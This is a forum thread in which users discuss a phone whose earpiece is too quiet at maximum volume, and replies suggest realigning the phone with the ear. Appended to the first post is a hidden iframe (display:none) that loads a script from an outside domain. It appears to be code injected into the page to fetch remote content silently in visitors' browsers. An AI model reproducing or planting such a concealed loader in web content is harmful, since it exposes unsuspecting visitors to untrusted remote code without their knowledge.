+ Reply to Thread

Thread: Headset volume

Headset volume

I'm maxed out on the headset volume at 7, but I have a hard time hearing the caller. It's better with an earpiece, but I don't always have one around. Is there anyway to boost the volume. Outside I can barely hear the caller...

Thanks in advance.

Tracey<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

what is the earpiece?

cjc
    I have had the same issue. The volume does not seem as load as my old cell phone. I just tried enabling the auto-volume with it maxed to 7. Time to thumb through the manual.

Administrator
    Originally posted by rcyphermd
    what is the earpiece?
    headset, mono only earpiece... etc...

The earpiece (headphones) work fine. It's the phone itself when held up to my ear. I can barely hear. I wonder if this will get better with a firmware upgrade, whenever that is.

Tracey

Try keeping your ear a fraction of an inch away from the earpiece when listening. If it seems a bit better, you probably had the earpiece misaligned from your ear, so part of your ear actually covers the earpiece. It takes some trial/error to get it aligned.

I had exactly the same issue when I first got the phone. Then after a few calls I got the hang of it. Now it's instinctive. You have to have the earpiece exactly in line with the ear opening or you can't hear a thing.